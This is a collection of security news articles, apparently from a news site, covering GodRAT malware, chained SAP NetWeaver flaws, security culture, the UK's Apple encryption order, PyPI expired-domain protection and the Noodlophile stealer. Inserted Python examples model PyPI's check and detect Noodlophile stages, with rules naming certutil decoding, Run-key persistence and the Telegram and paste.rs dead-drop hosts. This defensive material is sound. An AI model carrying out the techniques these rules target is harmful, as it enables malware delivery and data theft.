    The attacks, which have been active as recently as August 12, 2025, employ steganography to conceal within image files the shellcode used to download the malware from a command-and-control (C2) server. The screen saver artifacts have been detected since September 9, 2024, in countries and territories including Hong Kong, the United Arab Emirates, Lebanon, Malaysia and Jordan.

    Assessed to be based on Gh0st RAT, GodRAT follows a plugin-based approach to augment its functionality in order to harvest sensitive information and deliver secondary payloads like AsyncRAT. It’s worth mentioning that Gh0st RAT had its source code leaked publicly in 2008 and has since been adopted by various Chinese hacking groups.


    The Russian cybersecurity company said the malware is an evolution of another Gh0st RAT-based backdoor known as AwesomePuppet, which was first documented in 2023 and is believed to be the handiwork of the prolific Chinese threat actor Winnti (aka APT41).

    The screen saver files act as a self-extracting executable incorporating various embedded files, including a malicious DLL that’s sideloaded by a legitimate executable. The DLL extracts shellcode hidden within a .JPG image file that then paves the way for the deployment of GodRAT.

    The trojan, for its part, establishes communication with the C2 server over TCP, collects system information, and pulls the list of installed antivirus software on the host. The captured details are sent to the C2 server, after which the server responds with follow-up instructions that allow it to –

    • Inject a received plugin DLL into memory
    • Close the socket and terminate the RAT process
    • Download a file from a provided URL and launch it using the CreateProcessA API
    • Open a given URL using the shell command for opening Internet Explorer

    One of the plugins downloaded by the malware is a FileManager DLL that can enumerate the file system, perform file operations, open folders, and even run searches for files at a specified location. The plugin has also been used to deliver additional payloads, such as a password stealer for Google Chrome and Microsoft Edge browsers and the AsyncRAT trojan.

    Kaspersky said it discovered the complete source code for the GodRAT client and builder that was uploaded to the VirusTotal online malware scanner in late July 2024. The builder can be used to generate either an executable file or a DLL.


    When the executable option is chosen, users can select from a list the legitimate binary into which the malicious code is injected: svchost.exe, cmd.exe, cscript.exe, curl.exe, wscript.exe, QQMusic.exe and QQScLauncher.exe. The final payload can be saved with one of the following file types: .exe, .com, .bat, .scr and .pif.

    “Old implant codebases, such as Gh0st RAT, which are nearly two decades old, continue to be used today,” Kaspersky said. “These are often customized and rebuilt to target a wide range of victims.”

    “These old implants are known to have been used by various threat actors for a long time, and the GodRAT discovery demonstrates that legacy codebases like Gh0st RAT can still maintain a long lifespan in the cybersecurity landscape.”


    Source: thehackernews.com…

  • Public Exploit for Chained SAP Flaws Exposes Unpatched Systems to Remote Code Execution

    Public Exploit for Chained SAP Flaws Exposes Unpatched Systems to Remote Code Execution

    Aug 19, 2025 | Ravie Lakshmanan | Vulnerability / Cyber Espionage

    A new exploit combining two critical, now-patched security flaws in SAP NetWeaver has emerged in the wild, putting organizations at risk of system compromise and data theft.

    The exploit in question chains together CVE-2025-31324 and CVE-2025-42999 to bypass authentication and achieve remote code execution, SAP security company Onapsis said.

    • CVE-2025-31324 (CVSS score: 10.0) – Missing Authorization check in SAP NetWeaver’s Visual Composer development server
    • CVE-2025-42999 (CVSS score: 9.1) – Insecure Deserialization in SAP NetWeaver’s Visual Composer development server

    The vulnerabilities were addressed by SAP back in April and May 2025, but not before they were abused by threat actors as zero-days since at least March.


    Multiple ransomware and data extortion groups, including Qilin, BianLian, and RansomExx, have been observed weaponizing the flaws, not to mention several China-nexus espionage crews who have also put them to use in attacks targeting critical infrastructure networks.

    The existence of the exploit was first reported last week by vx-underground, which said it was released by Scattered Lapsus$ Hunters, a new fluid alliance formed by Scattered Spider and ShinyHunters.

    “These vulnerabilities allow an unauthenticated attacker to execute arbitrary commands on the target SAP System, including the upload of arbitrary files,” Onapsis said. “This can lead to remote code execution (RCE) and a complete takeover of the affected system and SAP business data and processes.”

    The exploit, the company added, can not only be used to deploy web shells but also be weaponized for living-off-the-land (LotL) attacks by directly executing operating system commands without dropping additional artifacts on the compromised system. These commands run with the privileges of the SAP administrator, granting bad actors unauthorized access to SAP data and system resources.

    Specifically, the attack chain first uses CVE-2025-31324 to sidestep authentication and upload the malicious payload to the server. The deserialization vulnerability (CVE-2025-42999) is then exploited to unpack the payload and execute it with elevated permissions.

    “The publication of this deserialization gadget is particularly concerning due to the fact that it can be reused in other contexts, such as exploiting the deserialization vulnerabilities that were recently patched by SAP in July,” Onapsis warned.


    This includes –

    Describing the threat actors as having extensive knowledge of SAP applications, the company is urging SAP users to apply the latest fixes as soon as possible, review and restrict access to SAP applications from the internet, and monitor SAP applications for any signs of compromise.


    Source: thehackernews.com…

  • Why Your Security Culture is Critical to Mitigating Cyber Risk

    Why Your Security Culture is Critical to Mitigating Cyber Risk

    After two decades of developing increasingly mature security architectures, organizations are running up against a hard truth: tools and technologies alone are not enough to mitigate cyber risk. As tech stacks have grown more sophisticated and capable, attackers have shifted their focus. They are no longer focusing on infrastructure vulnerabilities alone. Instead, they are increasingly exploiting human behavior. In most modern breaches, the initial attack vector is not a zero-day technology exploit. It’s exploiting vulnerabilities in people.

    The data is well-documented. For five years running, Verizon’s Data Breach Investigations Report has shown that human risk represents the greatest driver of breaches globally. The latest version of the report found that nearly 60% of all breaches in 2024 involved a human element. However, in that context, it’s important to address a common misconception. The phrase “people are the weakest link” implies that employees are at fault when breaches arise. In most cases, that isn’t the issue. Users aren’t failing at security; their security environment is failing them. Too often, security is made unnecessarily complex. Concepts are communicated in confusing and overwhelming technical language, while policies are designed for auditors and lawyers, not the average employee.

    In turn, effectively mitigating human risk isn’t a matter of just more technology adoption or policy enforcement. It’s about cultivating a strong organizational security culture that simplifies and supports secure human behavior. Until security culture is treated with the same prioritization and investment as your security technology, human risk will continue to undermine even the best-designed technical programs.

    Defining Security Culture

    Every organization already has a security culture in place. The key question is whether it’s the security culture they actually want.

    Security culture, by definition, is the shared perceptions, beliefs, and attitudes about cybersecurity across the organization. Do people believe security is important? Do they feel responsible? Do they see themselves as a target? When that belief structure is strong, behavior follows. But when it’s missing, for example when security is seen as someone else’s job or as an obstacle to productivity, risk grows sharply.

    The problem isn’t that people don’t care about protecting their organization. It’s that security isn’t embedded into how they work, instead layered on top as something they’re expected to navigate around. If we want people to behave securely, we need to create conditions that support those behaviors. Employees adjust their behavior based on what the environment rewards, enables, and expects. Security is no different. To strengthen security culture, the focus should be on designing a day-to-day environment that shapes people’s perceptions and decisions.

    In practice, this means evaluating the four biggest drivers of your security culture: leadership signals, security team engagement, policy design, and security training.

    1. Leadership signals: Culture starts at the top. If leaders treat security as a priority by budgeting for it, tying it to bonuses, or elevating the CISO in the org chart, it sends a clear message. If they don’t, no amount of lip service will change that perception.
    2. Security team engagement: It’s not just executives who shape culture. The day-to-day experience people have with security often depends on the security team itself. Is the security team helpful or hostile? Are they clear or confusing? Are they enablers or blockers? All of that matters.
    3. Policy design: Policies are a constant point of interaction. If they’re overly technical, hard to follow, or full of friction, they erode trust. If they’re simple and intuitive, they reinforce the idea that security is achievable.
    4. Security training: This is often the most visible part of a program, but also the most misunderstood. If your training is boring, outdated, or irrelevant, it signals that security doesn’t really matter. When engaging and applicable, it builds belief that drives behavior.

    These four areas also provide a framework for measuring your culture. Ask your employees what they think and feel about leadership, the security team, policies, and training. Their answers will tell you whether your culture is working for you or against you.

    Aligning the Four Levers of Security Culture

    Executive support may set the tone, but security culture is defined by what employees encounter day to day. If those lived experiences are inconsistent with leadership’s message, belief breaks down. People may hear that security is a priority, but if policies are unclear, training feels disconnected, or security teams are rigid and unapproachable, trust erodes quickly.

    This is why alignment across all four cultural levers – leadership, security team engagement, policy, and training – is essential. When leadership visibly prioritizes security, through resourcing and accountability, it signals strategic importance. But that message needs to be reinforced by how the security team interacts with the workforce. If employees feel punished for mistakes or stonewalled when they ask for support, they are less inclined to be active participants in defending the organization.

    Policy design plays an equally important role. When policies are long, technical, or impractical, employees will default to convenience even if it introduces risk. Simpler, more intuitive guidance makes it easier to act securely without slowing down business outcomes. The same principle applies to training. If it’s outdated or generic, it becomes a check-the-box exercise. But when it’s relevant and role-specific, it helps reinforce that security is part of the job—not an add-on to it.

    Ready to Operationalize Your Security Culture?

    Join me this fall at SANS Orlando Fall 2025, where I’ll be teaching the newly updated LDR521: Security Culture for Leaders. This course offers a step-by-step framework to assess your current culture, identify the top opportunities for change, and build an environment where secure behavior is the norm. You’ll leave with practical tools, real-world case studies, and a leadership-ready playbook you can take back to your team.

    Register for SANS Orlando Fall 2025 here.

    Note: This article was contributed by Lance Spitzner, Senior Instructor with the SANS Institute. Learn more about his background and experience here.


    Source: thehackernews.com…

  • U.K. Government Drops Apple Encryption Backdoor Order After U.S. Civil Liberties Pushback

    U.K. Government Drops Apple Encryption Backdoor Order After U.S. Civil Liberties Pushback

    Aug 19, 2025 | Ravie Lakshmanan | Encryption / Cloud Security

    The U.K. government has apparently abandoned its plans to force Apple to weaken encryption protections and include a backdoor that would have enabled access to the protected data of U.S. citizens.

    U.S. Director of National Intelligence (DNI) Tulsi Gabbard, in a statement posted on X, said the U.S. government had been working with its partners with the U.K. over the past few months to ensure that Americans’ civil liberties are protected.

    “As a result, the UK has agreed to drop its mandate for Apple to provide a ‘backdoor’ that would have enabled access to the protected encrypted data of American citizens and encroached on our civil liberties,” Gabbard said.

    The development comes after Apple switched off its Advanced Data Protection (ADP) feature for iCloud in the U.K. earlier this February, following government demands for backdoor access to encrypted user data.

    “We are gravely disappointed that the protections provided by ADP will not be available to our customers in the U.K., given the continuing rise of data breaches and other threats to customer privacy,” the company was quoted as saying to Bloomberg at the time.

    “As we have said many times before, we have never built a backdoor or master key to any of our products or services, and we never will.”

    The secret order to require Apple to implement a “backdoor” came in the form of a technical capability notice (TCN) issued by the U.K. Home Office under the Investigatory Powers Act (IPA) to enable blanket access to end-to-end encrypted cloud data, even for users outside the country. The order was issued in January 2025.

    Critics have argued that enabling access to encrypted cloud data, including backups, essentially amounts to building a backdoor that could be exploited by cybercriminals and authoritarian governments.

    Apple has since appealed the legality of the order, with the Investigatory Powers Tribunal (IPT) denying the Home Office’s attempts to keep the case a secret.

    Late last month, Google told TechCrunch that, unlike Apple, it did not receive any request from the U.K. to weaken encryption protections and allow authorities access to customer data.

    In a new letter sent to Gabbard, Senator Ron Wyden said Meta “offered an unequivocal denial […] stating that ‘we have not received an order to backdoor our encrypted services, like that reported about Apple.’”


    Source: thehackernews.com…

  • PyPI Blocks 1,800 Expired-Domain Emails to Prevent Account Takeovers and Supply Chain Attacks

    PyPI Blocks 1,800 Expired-Domain Emails to Prevent Account Takeovers and Supply Chain Attacks

    Aug 19, 2025 | Ravie Lakshmanan | Supply Chain Security

    The maintainers of the Python Package Index (PyPI) repository have announced that the package manager now checks for expired domains to prevent supply chain attacks.

    “These changes improve PyPI’s overall account security posture, making it harder for attackers to exploit expired domain names to gain unauthorized access to accounts,” Mike Fiedler, PyPI safety and security engineer at the Python Software Foundation (PSF), said.

    With the latest update, the intention is to tackle domain resurrection attacks, which occur when bad actors purchase an expired domain and use it to take control of PyPI accounts through password resets.

    PyPI said it has marked over 1,800 email addresses as unverified since early June 2025, as soon as their associated domains entered expiration phases. While this is not a foolproof solution, it closes a significant supply chain attack vector that would otherwise look legitimate and be hard to detect, it added.

    Email addresses are tied to domain names that, in turn, can lapse, if left unpaid – a critical risk for packages distributed via open-source registries. The threat is magnified if those packages have long been abandoned by their respective maintainers, but are still in a fair amount of use by downstream developers.

    PyPI users are required to verify their email addresses during the account registration phase, thus ensuring that the provided addresses are valid and accessible to them. But this layer of defense is effectively neutralized should the domain expire, thus allowing an attacker to purchase the same domain and initiate a password reset request, which would land in their inbox (as opposed to the actual owner of the package).

    From there, all the threat actor has to do is follow the reset steps to gain access to the account tied to that domain. The threat posed by expired domains came to the fore in 2022, when an unknown attacker acquired the domain used by the maintainer of the ctx PyPI package, gained access to the account, and published rogue versions to the repository.

    The latest safeguard added by PyPI aims to prevent this kind of account takeover (ATO) scenario and “minimize potential exposure if an email domain does expire and change hands, regardless of whether the account has 2FA enabled.” It’s worth noting that the attacks are only applicable to accounts that have registered using email addresses with a custom domain name.

    PyPI said it’s making use of Fastly’s Status API to query the status of a domain every 30 days and mark the corresponding email address as unverified if it has expired.

    Users of the Python package manager are being advised to enable two-factor authentication (2FA) and add a second verified email address from another notable domain, such as Gmail or Outlook, if the accounts only have a single verified email address from a custom domain name.
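    As an added illustration, not PyPI’s own code, here is a Python model of the policy the article describes: every 30 days, look up the status of the domain behind each custom-domain email, mark the address unverified when that domain has entered an expiration phase, skip addresses at major providers (the article notes the attack only applies to custom domains), and flag accounts that still rely on a single verified custom-domain address or lack 2FA. The domain-status vocabulary, the record layout, and the sample domains are constructed for this example; the real check queries the status API the article attributes to Fastly.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Callable, List, Optional

# Providers whose domains do not lapse the way a maintainer's own domain can.
# The article notes the takeover only applies to custom-domain addresses.
WELL_KNOWN_PROVIDERS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}

# Statuses treated as "entering an expiration phase". These values are
# constructed for this example; the real status API's vocabulary may differ.
EXPIRING_STATUSES = {"expiring", "pending_delete", "undelegated", "deleted"}

RECHECK_INTERVAL = timedelta(days=30)  # the article's 30-day cadence


@dataclass
class Email:
    address: str
    verified: bool = True
    last_domain_check: Optional[date] = None


@dataclass
class Account:
    username: str
    emails: List[Email]
    two_factor: bool = False


def domain_of(address: str) -> str:
    """Lowercased domain after the last '@'. A production check would reduce
    this to the registrable domain using the public suffix list."""
    return address.rsplit("@", 1)[1].lower()


def due_for_check(email: Email, today: date) -> bool:
    """True when the address has never been checked or the 30 days are up."""
    return (email.last_domain_check is None
            or today - email.last_domain_check >= RECHECK_INTERVAL)


def apply_domain_check(account: Account,
                       status_lookup: Callable[[str], Optional[str]],
                       today: date) -> List[str]:
    """Mark custom-domain addresses unverified when their domain is expiring.

    status_lookup stands in for the external domain-status API (assumption).
    Returns the addresses that were unverified in this pass.
    """
    newly_unverified = []
    for email in account.emails:
        domain = domain_of(email.address)
        if domain in WELL_KNOWN_PROVIDERS or not email.verified:
            continue  # major providers and already-unverified addresses: skip
        if not due_for_check(email, today):
            continue  # checked within the last 30 days
        email.last_domain_check = today
        if status_lookup(domain) in EXPIRING_STATUSES:
            email.verified = False
            newly_unverified.append(email.address)
    return newly_unverified


def takeover_exposure(account: Account) -> List[str]:
    """Flag the account shapes the article advises users to move away from."""
    findings = []
    verified = [e for e in account.emails if e.verified]
    if not verified:
        findings.append("no verified address remains")
    elif len(verified) == 1 and domain_of(verified[0].address) not in WELL_KNOWN_PROVIDERS:
        findings.append("only verified address is on a custom domain; add one from a major provider")
    if not account.two_factor:
        findings.append("2FA disabled")
    return findings


# Constructed sample data: these are not real accounts or domains.
SAMPLE_STATUSES = {
    "maintainer-example.test": "expiring",
    "healthy-example.test": "active",
}


def demo(today: date = date(2025, 6, 15)) -> List[str]:
    """Run one check pass over a sample account and return its findings."""
    acct = Account("maintainer",
                   [Email("dev@maintainer-example.test"), Email("dev@healthy-example.test")],
                   two_factor=False)
    apply_domain_check(acct, SAMPLE_STATUSES.get, today)
    return takeover_exposure(acct)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

    The check is idempotent within the 30-day window and never touches addresses at the listed providers, so the only accounts it can lock out of password reset are those the article describes as exposed: a single verified address on a domain that has started to lapse.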


    Source: thehackernews.com…

  • Noodlophile Malware Campaign Expands Global Reach with Copyright Phishing Lures

    Noodlophile Malware Campaign Expands Global Reach with Copyright Phishing Lures

    Aug 18, 2025 | Ravie Lakshmanan | Malware / Enterprise Security

    The threat actors behind the Noodlophile malware are leveraging spear-phishing emails and updated delivery mechanisms to deploy the information stealer in attacks aimed at enterprises located in the U.S., Europe, Baltic countries, and the Asia-Pacific (APAC) region.

    “The Noodlophile campaign, active for over a year, now leverages advanced spear-phishing emails posing as copyright infringement notices, tailored with reconnaissance-derived details like specific Facebook Page IDs and company ownership information,” Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.

    Noodlophile was previously detailed by the cybersecurity vendor in May 2025, uncovering the attackers’ use of fake artificial intelligence (AI)-powered tools as lures to propagate the malware. These counterfeit programs were found to be advertised on social media platforms like Facebook.

    That said, the adoption of copyright infringement lures is not a new development. Back in November 2024, Check Point uncovered a large-scale phishing operation that targeted individuals and organizations under the false premise of copyright infringement violations to drop the Rhadamanthys Stealer.

    But the latest iteration of the Noodlophile attacks exhibits notable deviations, particularly in its use of legitimate software vulnerabilities, obfuscated staging via Telegram, and dynamic payload execution.

    It all starts with a phishing email that seeks to trick employees into downloading and running malicious payloads by inducing a false sense of urgency, claiming copyright violations on specific Facebook Pages. The messages originate from Gmail accounts in an effort to evade suspicion.

    The message contains a Dropbox link that delivers a ZIP archive or MSI installer, which in turn sideloads a malicious DLL using legitimate binaries associated with Haihaisoft PDF Reader. Before the obfuscated Noodlophile stealer is launched, batch scripts establish persistence via the Windows Registry.

    What’s notable about the attack chain is that it uses Telegram group descriptions as a dead drop resolver: the description is read to obtain the address of the actual server (“paste[.]rs”) hosting the stealer payload, which complicates detection and takedown efforts.

    “This approach builds on the previous campaign’s techniques (e.g., Base64-encoded archives, LOLBin abuse like certutil.exe), but adds layers of evasion through Telegram-based command-and-control and in-memory execution to avoid disk-based detection,” Uzan said.
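    As an added example (not from Morphisec or the article), the following Python detection logic runs over constructed Sysmon-style events and flags the stages of the chain described above: an unsigned DLL loaded by a process from its own user-writable directory (sideloading), certutil.exe decoding a staged file (the LOLBin abuse mentioned), a Run-key entry pointing at a batch file, and a process running from a user-writable path reaching Telegram or paste.rs (the dead-drop fetch). The event schema, the binary name pdfreader.exe, the paths and the DLL name are hypothetical; the article does not name the reader binary or the DLL.

```python
import ntpath
import re
from typing import Dict, List

# Paths a standard user can write to; sideloaded DLLs and staged payloads
# in this chain live under such directories rather than Program Files.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\", re.I)

# Hosts used by the chain as a dead drop (Telegram) and payload host (paste.rs).
DEAD_DROP_HOSTS = {"t.me", "telegram.org", "api.telegram.org", "paste.rs"}


def in_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def same_dir(a: str, b: str) -> bool:
    return ntpath.dirname(a).lower() == ntpath.dirname(b).lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the chain stages this single event matches."""
    hits = []
    kind = ev["type"]
    if kind == "image_load":
        # Sideload: a user-writable process loads an unsigned DLL from its own folder.
        if (in_user_writable(ev["process"]) and same_dir(ev["process"], ev["dll"])
                and ev.get("signed") != "true"):
            hits.append("dll_sideload")
    elif kind == "process":
        exe = ntpath.basename(ev["image"]).lower()
        cmd = ev["cmdline"].lower()
        # LOLBin: certutil decoding or fetching a staged file.
        if exe == "certutil.exe" and ("-decode" in cmd or "-urlcache" in cmd):
            hits.append("certutil_decode")
    elif kind == "registry":
        value = ev["value"].lower()
        # Persistence: Run key pointing at a batch script or user-writable path.
        if r"\currentversion\run" in ev["key"].lower() and (
                in_user_writable(ev["value"]) or value.endswith((".bat", ".cmd"))):
            hits.append("run_key_persistence")
    elif kind == "network":
        host = ev["dest_host"].lower()
        # Dead drop / payload fetch from a process running out of a user-writable path.
        if in_user_writable(ev["process"]) and any(
                host == h or host.endswith("." + h) for h in DEAD_DROP_HOSTS):
            hits.append("dead_drop_fetch")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Map each triggered stage name to the indices of the events that fired it."""
    found: Dict[str, List[int]] = {}
    for i, ev in enumerate(events):
        for rule in check_event(ev):
            found.setdefault(rule, []).append(i)
    return found


def chain_score(found: Dict[str, List[int]]) -> int:
    """Number of distinct chain stages observed; several stages on one host
    is a far stronger signal than any single rule."""
    return len(found)


# Constructed sample telemetry (not real events). "pdfreader.exe", "helper.dll"
# and the Inv folder are hypothetical stand-ins for the sideloaded reader.
STAGE = r"C:\Users\u\AppData\Local\Temp\Inv"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": STAGE + r"\pdfreader.exe", "cmdline": "pdfreader.exe",
     "parent": "msiexec.exe"},
    {"type": "image_load", "process": STAGE + r"\pdfreader.exe", "dll": STAGE + r"\helper.dll",
     "signed": "false"},
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -decode stage.b64 stage.bin", "parent": "cmd.exe"},
    {"type": "registry", "process": "cmd.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": STAGE + r"\run.bat"},
    {"type": "network", "process": STAGE + r"\pdfreader.exe", "dest_host": "t.me"},
    {"type": "network", "process": STAGE + r"\pdfreader.exe", "dest_host": "paste.rs"},
    # Benign: the same reader installed normally, loading a signed system DLL.
    {"type": "image_load", "process": r"C:\Program Files\Reader\pdfreader.exe",
     "dll": r"C:\Windows\System32\version.dll", "signed": "true"},
]

if __name__ == "__main__":
    result = scan(SAMPLE_EVENTS)
    print(result, "stages:", chain_score(result))
```

    Each rule alone is noisy (certutil has legitimate uses, and many installers write Run keys); the value is in correlating several stages against the same process path, which is what the chain score is for.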

    Noodlophile is a full-fledged stealer that can capture data from web browsers and gather system information. Analysis of the stealer source code indicates ongoing development efforts to expand on its capabilities to facilitate screenshot capture, keylogging, file exfiltration, process monitoring, network information gathering, file encryption, and browser history extraction.

    “The extensive targeting of browser data underscores the campaign’s focus on enterprises with significant social media footprints, particularly on platforms like Facebook,” Morphisec said. “These unimplemented functions indicate that the stealer’s developers are actively working to expand its capabilities, potentially transforming it into a more versatile and dangerous threat.”


    Source: thehackernews.com…